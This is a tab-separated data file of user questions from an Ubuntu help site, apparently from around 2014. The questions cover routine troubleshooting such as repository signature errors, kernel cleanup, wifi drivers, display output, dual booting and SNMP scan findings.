517430	error occurring while updating the repo	i 'm using ubuntu 12.04 lts and getting this error while updating the repo . how to resolve this gpg error ? w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //ae.archive.ubuntu.com precise-backports release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key
517432	*solved* i 'm trying to boot up ubuntu using a usb , but the boot-up process is stuck	last night , the hard disk of my laptop encountered the click-of-death . as a result , i could n't boot into my windows 7 installation anymore . so that it 's not a total loss , i took the advice of a friend and tried setting-up a usb stick that could boot up ubuntu . using someone else 's ancient computer ( which runs win xp ) i downloaded ubuntu-14.04.1-desktop-amd64.iso , reformatted a spare usb i had , and followed the instructions detailed here : http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows then , i removed my old clicking harddrive and put in the usb in my laptop , hoping to boot up into ubuntu . however , i get stuck at some screen that looks like this message : syslinux 4.07 edd 4.07-pre7 copyright ( c ) 1994-2013 h. peter anvin et al after researching , i was thinking that maybe it has to do with my usb being detected as usb-fdd instead of usb-hdd ( as per the bios boot order screen ) ... but then i do n't have any idea how to make my laptop bios detect the usb as hdd . help please . thanks ! note : i 'm aware of the following question : not booting from usb or cd ( syslinux message ) - but my usb is already formatted fat32 and the boot options are set to boot from usb ( which should n't even matter i think since the bios will automatically try the next boot option anyway ? ) . the usb i 'm using is an hp v210w 4gb pen drive , if that helps . i 've already also done an md5sum check on the ubuntu-14.04.1-desktop-amd64.iso file and the hash checks out .
517436	how to disable notifications for a specific application ?	i recently installed the native linux spotify client on my ubuntu 14.04 , which works like a charm . the only thing that really really annoys me is that i get a notification for each new song that starts ( so every couple minutes ) which totally disturbes me in my work . there does n't seem to be an option to hide the notifications in the spotify client , so i tried looking for a solution to disable notifications for a specific application . searching around brought me to this askubuntu answer , but that only deals with changing colors of the notification or completely disabling them . so my question ; does anybody know of an application that can disable notifications for a specific application ? all tips are welcome !
517437	creating a kvm on ubuntu 14.04 host fails	i am trying this guide : https : //help.ubuntu.com/lts/serverguide/cloud-images-and-uvtool.html $ uvt-simplestreams-libvirt sync release=trusty arch=amd64 bogdanbiv @ bivub1404 : ~ $ time uvt-kvm create secondtest release=trusty real 0m0.673s user 0m0.127s sys 0m0.050s # although last command takes less than 1 second the next command proves # the former actually performed something bogdanbiv @ bivub1404 : ~ $ uvt-kvm create secondtest release=trusty uvt-kvm : error : libvirt : storage volume 'secondtest.qcow ' exists already bogdanbiv @ bivub1404 : ~ $ uvt-kvm wait secondttest -- insecure uvt-kvm : error : libvirt : domain not found : no domain with matching name 'secondttest' so what 's wrong here ? these are exact commands from the ubuntu documentation - i do n't see any difference so i assume something 's up . i had generated a rsa key before creating my vms .
517441	whenever i tried to install skype it 's shows me this message what it 's mean plz be helpful	┌─────────────────┤ configuring ttf-mscorefonts-installer ├─────────────────┐ │ │ │ truetype core fonts for the web eula │ │ end-user license agreement for microsoft software │ │ important-read carefully : this microsoft end-user license agreement │ ( `` eula '' ) is a legal agreement between you ( either an individual or a │ single entity ) and microsoft corporation for the microsoft software │ accompanying this eula , which includes computer software and may include │ associated media , printed materials , and `` on-line '' or electronic │ documentation ( `` software product '' or `` software '' ) . by exercising your │ rights to make and use copies of the software product , you agree to be │ bound by the terms of this eula . if you do not agree to the terms of │ this eula , you may not use the software product . │ │ │ │ │ └───────────────────────────────────────────────────────────────────────────┘
517443	output of xrandr in nvidia twinview	i do n't have a machine which is running with nvidia card . my machine is using intel速 hd graphics 4400 one mini displayport*1 1.2 supporting ultra-high definition 4k displays and multiple monitor functionality one mini hdmi* 1.4a port i can attach two monitors and they works fine , but when i print out xrandr screen 0 : minimum 320 x 200 , current 1920 x 2160 , maximum 32767 x 32767 hdmi1 connected 1920x1080+0+1080 ( normal left inverted right x axis y axis ) 477mm x 268mm 1920x1080 60.0*+ 59.9 1280x1024 75.0 1280x720 60.0 59.9 1024x768 75.1 60.0 800x600 72.2 75.0 60.3 56.2 720x480 60.0 59.9 640x480 75.0 60.0 59.9 720x400 70.1 dp1 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 480mm x 270mm 1920x1080 60.0*+ 1680x1050 60.0 1400x1050 60.0 1600x900 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x800 59.8 1152x864 75.0 1280x720 60.0 1024x768 75.1 60.0 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) they are in same screen 0 while i want them to be in two separate screen0 and screen1 . i have heard the nvidia twinview which supports dual head vga , is able to do that but i do n't make sure . short question : could anyone use the twinview and please paste your output of the command xrandr here ? i just want to know whether there are more than once a screen0 . thank you .
517444	windows install after ubuntu	saw the tutorials on here on how to do this but this is what i 've come across . both windows 7 and ubuntu 14.04 as of right now work just fine , i read i would have to fix grub and all that jazz but nothing of the sort happened i put windows on a second hard rive the only problem i 'm having is i can only enter windows by hitting f11 at bios ... .any fix for that ?
517446	ca n't install software through ubuntu software center	i 'm using ubuntu 14.04 32 bit . i ca n't install software through ubuntu software center . when i try to install , install button shows disabled and i tried file- > install its also the same .
517448	nemo randomly makes itself default file manager and creating desktop shortcuts	i 've installed nemo but have n't made it default and i have nothing on my desktop . but sometimes when i boot up i see computer , home and trash icons on my desktop and suddenly nemo is the default file manager as when i click any of my shortcuts or the new icons on my desktop nemo appears . when i restart it all returns to normal . my question is ... well ... wtf ? ! i was testing out nemo and intending to replace nautilus with something else but this stuff is really weird , can someone tell me what 's going on ? should i uninstall nemo ? i 'm really new to ubuntu or linux in general but i did n't find where those icons would be disabled when i look at my desktop on nemo via opening by the shortcut on my desktop , it shows nothing is there . when i look for desktop icons in unity tweak tool appereantly nothing is there and they do n't go away when i tinker with the settings . but after i restart 1 or 2 times the problem disappers and everything goes back to normal . so please , somebody help me make some sense out of this . also could someone tell me how to uninstall a software thoroughly in ubuntu ? it always leaves a lot of junk behind from my experience . screen shot 1 , the problem : screen shot 2 , two restarts later every thing is back to normal :
517449	some files transfer very slowly over sftp 14.04 vps	on one of my vpses , some files download extremely slowly ( 128kib/s at max ) and i can not figure out why that would be happening , all files are owned by the same user and all have the same permissions ( 775 ) . is there any reason why some files will download that slowly , even when others in the same folder download at the max speed my home connection allows ?
517451	were encountered while processing sudo apt-get -f install	when i run the sudo apt-get -f install i got the error ... no apport report written because maxreports is reached already errors were encountered while processing : initramfs-tools linux-image-3.5.0-54-generic linux-image-generic-lts-quantal udev anyone could help me to fix this ? thanks
517460	wifi led light always on never off	hello i 'm using the atheros a9485 and install ubuntu 14.04 lts in asus eeepc 1025c press fn f2 wifi -- > turns on or off the led lights always on never off what 's its solution ?
517462	way of receiving alerts on login attempts , whether successful or not ?	i believe my linux machine to be reasonably protected from external login . but since i am mildy paranoid , i would like to be alerted when there is a login attempt made to the server , whether successful or not . scanning the site , i can not find any unison way of doing this . as far as i can tell , for unsuccessful attempts logcheck has been recommended , and for successful ones the sshrc or ( perhaps even more ) pam_exec method . i like two-stones-in-one-throw methods , and wonder whether any of you pros know if there is a way of getting one of these methods to do both ? pam in particular seems to be a smart place to do things , since it is after all , from what i can tell , the central authentication system on my ubuntu machine . any advice ?
517463	wireless card unstable on lenovo yoga 2 pro	on ubuntu 14.04 32bit , after some up-time my wireless card stops working . some weeks ago it helped to stop wifi in the nm-applett ( at the top right corner ) and restart it to get a new connection to my wifi . i had this at several different locations so it was definitely a problem with my card . by now this does n't help anymore , maybe due to a newer kernel by now : $ uname -rp 3.14.1-031401-generic i686 my guess is that the wireless power save option that is set by powertop might cause some problems ? i added this to my /etc/rc.local so the end part looked like this : # by default this script does nothing . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # tune all power save settings to > good < powertop -- auto-tune once i disabled that option again , the wireless card seems to work better , but not all the time . when in the crashed state and if i try to re-enable wifi in the nm-applet i get this error in /var/log/syslog : iwlwifi 0000:01:00.0 : failed to load firmware chunk ! i collected some data with the help of this answer : # # # # # lspci # # # # # 01:00.0 network controller [ 0280 ] : intel corporation wireless 7260 [ 8086:08b2 ] ( rev 6b ) subsystem : intel corporation wireless-n 7260 [ 8086 : c262 ] kernel driver in use : iwlwifi full results if i look for locate 7260|grep -i wifi , i find the same module /lib/firmware/iwlwifi-7260-9.ucode like in the latest drivers on wireless.kernel.org how can i fix this problem on my lenovo yoga 2 pro ? maybe it is possible to reload the kernel module to re-enable it if it died ?
517465	how to delete programs in ubuntu 14.04	how to delete programs with all components ( full delete program ) so that , for example , you delete a program i firefox by sudo apt-get -- purge autoremove firefox but there are some additions are not deleted for example : firefox-locale-en xul-ext-ubufox unity-scope-firefoxbookmark rhythmbox-mozilla
517466	ubuntu claims its out of space ?	when my wife starts her computer , she is told ( after logging-in ) : the volume `` boot '' has only 0 bytes disk space remaining . you can free up disk space by removing unused programs or files , or by moving files to another disk or partition . examine ... | ignore refer to the screen-shot for the details under `` examine '' . some have suggested that this may be related to unused kernels ... but how is that possible with a fresh installation ? here 's a screen-shot from terminal which as i understand it , is showing the kernels on her computer : if the issue is in fact related to unused kernels , how do i identify which one 's to keep and remove ?
517467	how to display network manager icon on xfce panel	i install xfce in u trusty , but the network manager icon disappear.when i run sudo nm-applet , the icon shows.not only the network manager , but also power manager and fcitx icon disappear , fcitx is a chinese input method . how can i resolve this ?
517468	how does dnsmasq cache for my entire network ?	i have a core2 duo dell i got my hands on , i decided to install ubuntu server 14.04 for learning more about linux , i googled good things to run on a server and came across dnsmasq i understand its purpose is to cache dns queries . i have installed it following : https : //help.ubuntu.com/community/dnsmasq when i run dig google.ca on the server machine i get the expected 0ms but when i run it on another computer on the network , i get average 70ms i have a router , i tried putting my router dns to 10.0.0.100 which is my server it did n't seem to do anything to help the speed .
517470	how to create smooth , simple animations in ubuntu	i want to create some smooth , simple animations like those in the various computer interfaces in the film `` oblivion '' ( as shown here ) . what would be some good tricks or programs for doing this ?
517471	is there a way to check ubuntu installation health ?	i 'm a person who wants to be sure before continue working on his system . because of that , i would like to know if my ubuntu installation is in a good condition or not . some of the things i would like to know : if there is a missing necessary package or not . all packages are healthy . there is no missing file in system . there is no broken package and etc ... long story short is there a way i can check if my installation is healthy , in a good condition or not . if that 's important , i 'm using 14.04 at the moment . thanks .
517474	why am i getting error : need a single repository as argument for sudo add-apt-repository ppa : paolorotolo / android-studio	i am executing the following command as per the instructions in the link . sudo add-apt-repository ppa : paolorotolo / android-studio i am getting the error - error : need a single repository as argument . i am running 64 bit ubuntu 14.0 how should i proceed ?
517477	nessus snmp security warning	i ran a nessus scan on my ubuntu 14.04 machine . i received the following : high : snmp agent default community name ( public ) description : it is possible to obtain the default community name of the remote snmp server . an attacker may use this information to gain more knowledge about the remote host , or to change the configuration of the remote system ( if the default community allows such modifications ) . solution : disable the snmp service on the remote host if you do not use it . either filter incoming udp packets going to this port , or change the default community string . port 161 /udp/snmp can anyone tell me which of these solutions i should do and how to do it ?
517480	match-on-card logon	i am interested in developing a match-on-card logon functionality for users on ubuntu . i 've searched through pam modules , in ubuntu software center , and with google , and found nothing that would help me . the scenario is next : a smart card reader with fingerprint scanner is connected to the computer . user 's fingerprint is stored on the smart card , not on the computer . so , when user inserts his card into the card reader , he also scans his fingerprint . reader is supposed to compare the given fingerprint with the fingerprint on the card . if they match , user then has to enter his pin on ubuntu login screen . is there a pam module that does this , or do i have to write my own module ? also , where to start with writing pam module , if that is necessary ? or , is there some other module , or library that make this functionality possible ? i have also bumped into bioapi , but there is no explanation , or docs that i have found , that explains how to implement moc on ubuntu using pam .
517481	vga output not working for intel gs45 express chipset	i have just installed ubuntu 14.04 64-bit on my toshiba portege r600-10q laptop ( a model from 2009 ) . i am now trying to display the desktop on a benq senseye3 22 '' monitor , via the vga output , but it 's not working - the monitor says `` no signal detected ! '' . what i 've done : i have gone into `` screen display '' , where i can see the monitor is detected by the laptop . the monitor has a 1920 x 1080 native resolution , which i have tried to use , but i have also set it to lower resolutions , e.g . 1024 x 576 . i have tried to use the monitor in dual screen , mirrored and single screen mode - none work . i have tried pressing fn + f5 to get single screen output - the laptop screen goes blank , but still no output on the monitor . i have tried several monitors ( of the same type , and also of a different make ) , so i do n't think it 's that . if , and only if , the monitor was plugged in to the pc 's vga output during boot up , then the display outputs to the monitor correctly . but if i plug the vga cable in after boot up , then the monitor receives no signal . the laptop has the intel速 gs45 express chipset for graphics acceleration . i installed mesa-utils and ran glxinfo in a terminal . amongst the output was : opengl renderer string : mesa dri mobile intel速 gm45 express chipset also , in the `` about this computer '' window i see : graphics : mobile intel速 gm45 express chipset i wonder if the problem is that my chipset is gs45 not gm45 . one last thing . the output of `` sudo lshw -c video '' is : *-display:0 description : vga compatible controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 07 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:44 memory : ff400000-ff7fffff memory : e0000000-efffffff ioport : cff8 ( size=8 ) *-display:1 unclaimed description : display controller product : mobile 4 series chipset integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 07 width : 64 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : ffc00000-ffcfffff this issue seems identical to the one in this question , which was bizarrely closed . the output above is certainly very similar . also it seems identical to the bug reported here . any help gratefully received .
517482	ca n't mount cowon i10	does anyone know how to make ubuntu ( 14.04 ) read a cowon i10 mp3 player ? after a search , i found a similar question , and the answer was to change the settings in the mp3 player to usb `` mtp '' i did so , and the only difference is , instead of ignoring it completely , i get a message stating `` unable to mount usb iaudio10 . unable to open mtp device '' and it does n't give me any option . any help please ? edit : ok , after changining it back to mtp , it read it..only i could n't copy files on to it , delete files , or pretty much anything due to it being `` read only file system '' . after looking around for ways to sort that out , i found nothing , and took a dive in to the deep and formatted it . that was a lot of music . anyway , after that , i reconnected , it read and tried moving files , and it worked . now i 'm gong to check if it works with windows as well .
517487	how to install windows 7 in dual boot with ubuntu ( ubuntu pre-installed )	i want to ask how can i install windows 7 home premium in dual boot with pre-installed ubuntu . i`ve never opened my laptop , so the ubuntu set-up is not made .
517489	how to install x.org drivers and be able o boot a	i have a small nvidia gts 250 graphic card connected to my pc and i burned my ubuntu 14.04 system several times by installing the nvidia drivers after the os was already in place . the problem was that the system would not boot up after the driver installation . i know there would be the option to install drivers during the installation , but i usually do an offline installation and then after configuring ufw do all the updates . so my question is how i could install the drivers while my system is already installed and running and be able to boot afterwards without problems . the additional driver menu shows me that a nvidia gts 250 is in use and there is a dot at using x.org-x-server driver . however when i type x.org in dash it shows me nothing and id like to configure brightness in graphical overlay .
517492	redirect input from file	i 'm writing a script ( test.sh ) that must run another script ( task.sh ) ... task.sh need two input ... so i was thinking to redirect input from a file ( i need to automize everything ) ... so , i was using theese solutions : exec `` $ assessment_tests/task.sh '' `` $ parameters '' < `` $ testdir/stdin '' > `` $ testdir/output2 '' ; but i receive an `` access denied '' error and this other solution bash `` $ assessment_tests/task.sh '' `` $ parameters '' < `` $ testdir/stdin '' > `` $ testdir/output2 '' ; ( i 've changed exec with bash ) in the second way i can run the script task.sh but in output2 i always find the message `` input wrong '' where `` input wrong '' is the output of task.sh ... but i should obtain `` input ok '' ... my stdin file is just a row with the value `` my_input '' any suggestion ? thanx
517493	how can i prevent being locked out after changing the iptables default policy ?	i am working on a experiment when i ( client ) ssh a gateway and run sudo iptables -- policy input dropthen the gateway does n't accept any communucation ( or input ) from my client . by running sudo iptables -- policy input accept on the gateway , then the client is able to write again . my question is how can i restore the situation from the client ?
517495	what kernels & packages do i un-install ?	okay , my wife 's computer is apparently running out of space on /boot and from what i can tell in similar questions , it 's related to unused kernels ( which makes no sense , considering it 's a fresh installation ! ) ... but what do i actually un-install ? other questions here indicated i needed to keep the most recent kernel ( linux-image-3.13.0.34-generic ? ) and the backup/fallback ( linux-image-3.13.0.32-generic ? ) ... so does that mean i should be removing everything else ( linux-image-3.13.0.xx-generic , linux-image-extra-3.13.0.xx-gen and linux-image-generic ) ? do i need to keep those `` linux-image-extra-3.13.0.32-gen '' and `` linux-image-extra-3.13.0.34-gen '' packages , if this is the case ? i was able to find plenty of questions telling me how to remove unused kernels ... but not too many telling me how to identify ( well , `` confirm '' really ) what has to come off . any help in identifying exactly what has to be removed would be appreciated .
517499	`` depends : ___ but ___-saucy is to be installed '' type broken dependencies after trusty upgrade	the installer threw an error near the end of the 14.04 trusty upgrade . unity-control-center is not installed and upon trying to install it i now have a chain of broken dependencies which , after going several dependencies deep , end in messages similar to libegl1-mesa-drivers : depends : libegl1-mesa ( = 10.1.3-0ubuntu0.1 ) but 10.3.0~git20140618.88b887fa-0ubuntu0ricotz~saucy is to be installed . i have tried all the tactics at the excellent thread how do i resolve unmet dependencies ? including using the ppa tool recommended there . and the widely suggested command sudo apt-get -f install produces 0 to upgrade , 0 to newly install , 0 to remove and 0 not to upgrade . so this is something else . obviously `` saucy '' in the error should be replaced with trusty , but i can not find support for this error or how to fix it . how can this sort of error be addressed ? update : part of the answer is to install packages using the suffix after the equals sign . so for example , libegl1-mesa-drivers=10.1.3-0ubuntu0.1 it then asks me to downgrade after i do this in the case of several packages . however i can not get one package : sudo apt-get install libglapi-mesa=10.1.3-0ubuntu0.1 for which i get the error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . going to packages.ubuntu.com/search ? keywords=libegl1-mesa for more information i see that libglapi-mesa=10.1.3-0ubuntu0.1 is part of the trusty-updates package rather than the trusty lts package . is that significant ? can i install trusty-updates somehow ? or if not can i install the package listed on the package page for utopic ?
517500	what does it mean to load a kernal image ?	i came across the following statement .. when booting linux , the boot loader is responsible for loading the kernel image and the initial ram disk ( which contains some critical files and device drivers needed to start the system ) into memory . what does it mean to load a kernal image and initial ram disk , is there any command or application by which i can see them logically where they are ?
517501	update ubuntu on partition 2 from downloaded packages in partition 1	i have two partitions . on partition 1 i have installed ubuntu 14.04 . on partition 2 i have installed a back up copy of ubuntu 14 . 04 . i upgrade ubuntu regularly on partition 1 . is it possible to upgrade ubuntu on partition 2 with downloaded packages from partition 1 ? thanks .
517505	remapping k to the right shift button	i have been looking on askubuntu for help , but could n't find the help i needed , so now i just ask . my k key does n't work , when pressed , and since its a older laptop , i just wish to remap the k key unto the right shift . from what i have gathered , i need to use xmodmap and xev , but i ca n't figure out how to remap the k key in question . ( copy pasting 'k ' is getting very annoying xd ) hope some of you can help me . thanks !
517508	add a background image for nautilus in ubuntu 14.04	i 'm using ubuntu 14.04 lts 32 bit os . please anyone can tell me how to add background image for nautilus ( file browser ) and change the background color of nautilus . please help me .
517511	how to delete permanently printers in the printers list in ubunto 14.04	i 've got the same problem of onother user i want to remove some printers i edited the file /etc/cups/printer.conf and it removes it temporarily , but when i reboot the machine it seems that it adds the printers automatically from the network . how can i avoid this/ remove them permanently ? so i read the answers and i ran suggestions ( ubuntu 14.04 ) - > sudo cupsctl -- no-remote-printers command erases the error : cupsctl : opzione sconosciuta `` -- no-remote-printers '' ( unknown option ) and in /etc/cups/cupsd.conf is set browsing off already but the problem remains unsolved ! i have hplip installed .
517515	installing nemo file manager on ubuntu 14.04 lts	how to install nemo file manager on ubuntu 14.04 lts 32 bit please anyone help me . which repositories should i use for installing nemo on ubuntu .
517517	gigabyte - amd radeon r7 250 issues	i used ubuntu 12.04lts . my desktop ca n't start up after i installed the fglrx from additional drivers in the system setting menu . it stop at start-up purple screen . how can i fix this error ?
517518	freeing space on /	recently i experienced x server fails on my ubuntu 12.04 . when i booted up i got a window sayig that system is running in low-res mode , the option to run it like that once , failed . - coulnd't log in on graphics session - the only consoles left were ttys . i tried to purge some old kernels with apt-get - but the operation failed ! ( no space on device ) so i tried to manually make some free space in /boot via livecd system ( i ran out of space on / ) and found this answer : http : //askubuntu.com/a/401259/321653 all paths are paths on ubuntu hdd instalation , but all cmd outputs are from debian mint running from livecd . the problem is that after removing theese old kernels , both df and nautilus are still showing 0 bytes free : mint mint # df -h filesystem size used avail use % mounted on aufs 1.5g 21m 1.5g 2 % / tmpfs 1.5g 0 1.5g 0 % /lib/init/rw udev 1.5g 284k 1.5g 1 % /dev tmpfs 1.5g 156k 1.5g 1 % /dev/shm /dev/sr0 875m 875m 0 100 % /live/image tmpfs 1.5g 21m 1.5g 2 % /live/cow tmpfs 1.5g 0 1.5g 0 % /live tmpfs 1.5g 28k 1.5g 1 % /tmp /dev/sda7 24g 24g 0 100 % /media/79cfe116-4ebf-461c-9d96-e992a7916a8f /dev/loop0 865m 865m 0 100 % /media/disk /dev/sda5 159g 61g 90g 41 % /media/home /dev/sda7 is my / partition ( was doing this on live debian mint ) the command was invoked from 'sudo su'
517519	is this a security risk/concern ?	according to : http : //wiki.secondlife.com/wiki/linux_viewer # installing_and_running the second life linux client entirely runs out of the directory you have unpacked it into - no installation step is required . how is that possible ? is n't that a security risk ? i tried it , and it indeed ran without installing anything , i did n't have to type in my password to install it or anything . it just launched . double clicking the application even created an entry in unity . i tried this on ubuntu 12.04 .
517522	inall ubuntu to a shink volume	i am using windows 7 , and i am going to install ubuntu to d : \ drive . my windows 7 is installed to c : drive . i shrinked a volume from d drive . what things i need to do to let ubuntu install to that shrinked volume perfectly ? thank you .
517523	how can i execute shell command in server ?	i have a problem that is execute bunch of shell command to the live server . how can i do this ? i have searched something about it and here i got a following solution . the solution is that the following command need to be run in my server . but i do n't know how can i run this command . eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 00 : e0:22:51:89 : a3 brd ff : ff : ff : ff : ff : ff inet 192.168.1.101/24 scope global eth0 here i know `` 192.168.1.101 '' is the ip address of my server . but i do n't know what is the meaning of `` broadcast , multicast , up , lower_up '' . can any one help me ?
517524	adding fonts to photoshop cs6 run with wine	i have photoshop cs6 installed and working on wine1.7 . it 's actually surprisingly smooth . the only issue i have now is that the fonts are a bit limited , and i 'm not sure if it 's an issue with wine or with the photoshop installation . i tried copying some fonts to the ~/.wine/drive_c/windows/fonts/ directory but they are not appearing in photoshop . what should i do ?
517529	delete data ( or recover other data ) from unmountable windows partition	ok , here 's my story . i trying to recover some photos from a failed windows hdd ( toshiba 320gb ) . i can mount all partitions except disc c : ( where the photos are , lucky me ) . the problem is that the windows is hibernated.. sounds easy , right ? tried the common solution to remove the hiber file with ntfs-3g . result : drive has bad sectors , run chkdisc /f and reset twice . ran chkdisc /f ( with minixp ) and restarted . did it a thousand times . no result . tried ntfsfix . result : unable to mount , windows is hibernated . shut it down properly . tried nearly all recovery tools out there . fail and usually the logs just state that it failed . after a lot of tries i managed to open the disc with testdisk . it reads all the files , directly in c : but it fails to detect anything outside of the root folder . the problem ? pagefile.sys + hiberfile totaling 53,533 tb ( wait , wut ? was n't the disk 320gb ? ) . upon reaching them , testdisk stops . my question is : can i delete the 2 files from ubuntu ? if no , is there a way to go beyond the root folder of c : and ignore the 2 problems . to clarify : windows does not run , so i can not shut it down correctly . the windows recovery tools do n't fix the problem . the only alternative solution i can find is disk regenerator , which 'fixes ' about 3gb worth of files and crashes with no error ( probably starts reading one of the aforementioned files ) . upon running it find 95 % of the bad sectors again . so total recovery time will be about a year this way .
517531	installing ubuntu server 14.04 on a pre-built raid array	so i 've got a raid array built ( via the asus motherboard , 2 disks , raid 1 ) . when i try to install ubuntu server on it , the process runs as normal ( apart from the drive is detected as md126p1 rather than the normal sda or sdb etc ) . but then on reboot , i just get the little blinking cursor , and nothing happens ... have i missed something here ? is there something else i 'm supposed to do ?
517532	linux-image-generic missing - is this a problem ?	after removing old and unused kernels from my wife 's laptop as per this question : what kernels & packages do i un-install ? i thought i 'd do the same on my laptop , since i 've been running ubuntu for years and upgrading to every version ( .04 and .10 ) as i go ... surely i must have a pretty big list of kernels floating around by now . according to aptitude search ~ilinux-image though , i have just one kernel ( in addition to its associated `` extra '' package ) , and it 's quite an old kernel too ( well , in comparison to the wife 's computer , at least ) . more concerning however , is the fact that linux-image-generic appears to be missing - it 's not even listed at all , like on the wife 's laptop ! should i be worried that this package is missing ? is it just sudo apt-get install linux-image-generic to re-install it ?
517536	how to install edubuntu 12.04 side by side with windows 8.1	i have to install it using a live cd . for booting can i choose legacy booting ? it selects sda/6 to install which does n't have sufficient memory & root path . i am waiting for step by step installation help .
517539	preserving gtk theme with gksudo	i have a computer with two ( non simultaneous ) users who are both in the sudo group . is there a way to preserve the user 's gtk theme with gksudo , for instance when running the update manager ? by default the raleigh theme is used . i use lubuntu 14.04 with a simple window manager ( blackbox ) and no display manager .
517541	can i reformat a disk partition in order to install windows alongside ubuntu ?	i have a hp pavailion g6 laptop which came preinstalled with windows 8 , but i tried ubuntu and fell in love with it . i removed windows to get more room for ubuntu . the real problem arose when i needed to get a program developed by our institute which is currently made only for windows machines . so i made a partition of 150 gb and tried to re-install windows with a windows cd . it gave an error that the disk is formatted by someone who does n't understand gpt partitioning . now the only option i know is to use diskpart from cmd , which i do n't really want to do because i do n't have ext hdd big enough to save all necessary data . so is there any way to convert just a disk partition ( i do mean disk partition , not the entire disk ) to mbr or windows-supported gpt format ? edit : guys please do n't give me suggestions for using vmware or wine.see the comments on first answer for vmware complications and commecnts on second answer for incompatibility with wine .
517543	how to install canon lbp3300 & lbp2900b in 14.04lts	can any one tell how i can install canon lbp2990b & lbp3300 printer in 14.04 lts . i have downloaded and install .tar file from canon website and after ward its installing but i am not able to take print out are any one solution for this
517544	. aplay . aplay : device_list:268 : no soundcards found	i had accidentally install oss and removed alsa . but i should reinstall alsa . when i typed sudo apt-get -- reinstall install linux-sound-base alsa-base alsa-utils it was succeed . but when i check aplay -l following messages shown . . aplay . aplay : device_list:268 : no soundcards found . lspci and lsusb shows my soundcards but /dev/snd has only 2 directories . crw-rw -- -- 1 root audio 116 , 1 8ć 29 20:14 seq crw-rw -- -- 1 root audio 116 , 33 8ć 29 20:14 timer i checked other threads on ubuntu but nothing can help me . my alsa-info is here . http : //www.alsa-project.org/db/ ? f=1449111193e3d804262970c4fa8a833ae0e0ffa3 i am very confused . please help ! ! there is /etc/modprobe.d/blacklist-oss.conf and there is no /etc/modprobe.d/blacklist-alsa.conf ( sorry for my bad english . ) regards , tomonari
517545	installed ubuntu ( 14.04 ) on external hdd and lost data	i 've installed ubuntu on external hdd without formating and lost 800gb from it . i 've installed it from flash drive from ubuntu to try . when i plug it into turned on win pc , nothing shows , and when i plug it into turned on pc with ubuntu , just system data are on the hdd , but installation was quick , nothing formated , so i think , my data are there , but somehow hidden . please help ...
517546	kernel panic occured after installing wifi driver	i have exactly this problem . i retype some of it in case link goes offline . i have notebook lenovo e540 . i think i 'm using 14.04.1 lts ( did n't check ) and kernel 3.13.0-35 . my wifi stoped working after few minutes and i could not get it going . so i googled for the solution . i found this : from there i tried the solution in # 29 i have tried the following on several kernels ( under 12.04 and 14.04 ) and so far it has worked well : sudo apt-get install linux-headers-generic build-essential git # needed only if you do n't have yet that package git clone http : //github.com/lwfinger/rtl8723be # needed only if you do n't have yet downloaded rtl8723be cd rtl8723be git checkout 604aa9058fb9e5bb1cf571c99989d081f8fc8b9 make clean make sudo make install sudo modprobe rtl8723be echo `` options rtl8723be fwlps=0 '' | sudo tee /etc/modprobe.d/rtl8723be.conf but it broke my system . i get kernel panic because of rtl8723be driver . i try to load to recovery mode - > root shell and run : modprobe -r rtl8723be no output . did n't help . how do i remove that driver from system ? i would like to avoid reinstalling whole system .
517550	lxc cpu and i/o priority alongside with kvm	i am switching most of my linux guests to lxc . in kvm i configured priorities with a script and config . the script just executed nice and ionice commands to kvm pid . now i have lxc with linux and also some kvm with mac ox x ( kernel 3.15 now support it out of the box ) . how i can configure the processor and i/o priorities to both of them ? is it ok to run nice and ionice to lxc init pid ? or need to use some lxc tool ? thanks .
517552	i have install skype but it 's not launching	dpkg : considering removing skype-bin in favour of skype ... dpkg : no , can not proceed with removal of skype-bin ( -- auto-deconfigure will help ) : skype depends on skype-bin skype-bin is to be removed . dpkg : regarding skype-ubuntu-precise_4.3.0.37-1_i386.deb containing skype : skype conflicts with skype-bin skype-bin ( version 4.3.0.37-0ubuntu0.12.04.1 ) is present and installed . dpkg : error processing archive skype-ubuntu-precise_4.3.0.37-1_i386.deb ( -- install ) : conflicting packages - not installing skype errors were encountered while processing : skype-ubuntu-precise_4.3.0.37-1_i386.deb
517554	software center crash 14.04	every time i open the software center it opens and freezes for about 3 seconds , then it just closes . i have tried an update command line , but it did n't work . any ideas ? also , i keep getting an error when i start that gives me this error code : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_trusty-updates_main_i18n_translation-en e : the package lists or status file could not be parsed or opened .
517556	evolution keeps requiring passwords	i am running on xubuntu 14.04 with xfce desktop . i recently installed evolution email client which i like . however , one annoying feature is that every time i log in to evolution i get mail authentication requests that involve me having to enter the passwords of my email accounts . only then do i get access to my mail . i tick the box to save to my keyring , not that i have a keyring that i am aware of , but that makes no difference . i also frequently get requests on other sites to enter a password to unlock my keyring and i have to click on 'cancel ' to make the request box go away . i have asked this question in ubuntu forums but had no response . when i google similar questions there are a number of differing answers but most of the `` try this '' variety . none seem to give an answer that is specific to xubuntu xfce and most seem to assume they are replying to command line experts . the problem seems to revolve around the relationship between gnome keyring , evolution and xcfe , or so i gather , but it is all way over my head . can anyone help please .
517558	unlock keyring with fingerprint on login 14.04	i have a thinkpad with a fingerprint reader installed . in windows i can log in perfectly fine without typing a password . is there any way to unlock the login keyring from the fingerprint scanner ? i already have fingerprint gui installed and it does not seem to solve the problem .
